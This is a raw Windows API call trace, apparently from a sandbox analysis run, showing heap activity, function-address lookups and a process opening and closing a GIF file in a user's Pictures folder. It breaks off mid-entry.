[0191.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0191.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9c70 [0191.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9b9c70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0191.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.446] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0191.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0191.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0191.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0191.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0191.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0191.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0191.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0191.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0191.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0191.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x33) returned 0x90ad98 [0191.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif", cchWideChar=51, lpMultiByteStr=0x90ad98, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif", lpUsedDefaultChar=0x0) returned 51 [0191.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0191.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0191.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0191.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.447] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ov_bhlk.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0191.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0191.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0191.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0191.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0191.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0191.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0191.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0191.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0191.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0191.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0191.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0191.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0191.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0191.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=51, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0191.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x66) returned 0x8e8320 [0191.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=51, lpWideCharStr=0x8e8320, cchWideChar=51 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif") returned 51 [0191.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0191.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0191.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8320 | out: hHeap=0x8a0000) returned 1 [0191.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0191.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0191.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0191.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0191.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0191.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0191.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0191.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0191.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0191.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0191.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0191.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0191.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0191.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0191.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0191.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0191.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0191.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0191.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0191.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0191.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0191.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0191.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0191.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0191.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0191.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0191.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0191.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0191.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0191.450] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0191.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0191.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0191.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0191.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0191.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0191.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0191.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0191.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0191.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0191.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0191.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0191.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0191.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0191.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0191.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0191.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0191.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0191.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0191.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0191.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0191.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0191.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0191.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0191.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0191.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0191.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0191.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0191.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0191.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0191.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0191.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0191.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0191.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0191.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0191.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0191.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0191.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0191.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.452] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0191.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0191.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0191.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0191.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0191.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0191.453] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0191.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0191.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0191.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0191.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0191.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0191.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0191.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0191.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0191.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0191.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0191.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0191.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0191.454] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0191.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0191.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0191.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0191.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0191.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0191.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0191.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0191.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0191.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0191.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0191.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0191.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0191.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0191.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.454] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0191.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0191.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8a0 [0191.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd8a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0191.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0191.455] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0191.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0191.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0191.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0191.455] CloseHandle (hObject=0x158) returned 1 [0191.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0191.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0191.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0191.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0191.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0191.456] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0191.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0191.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 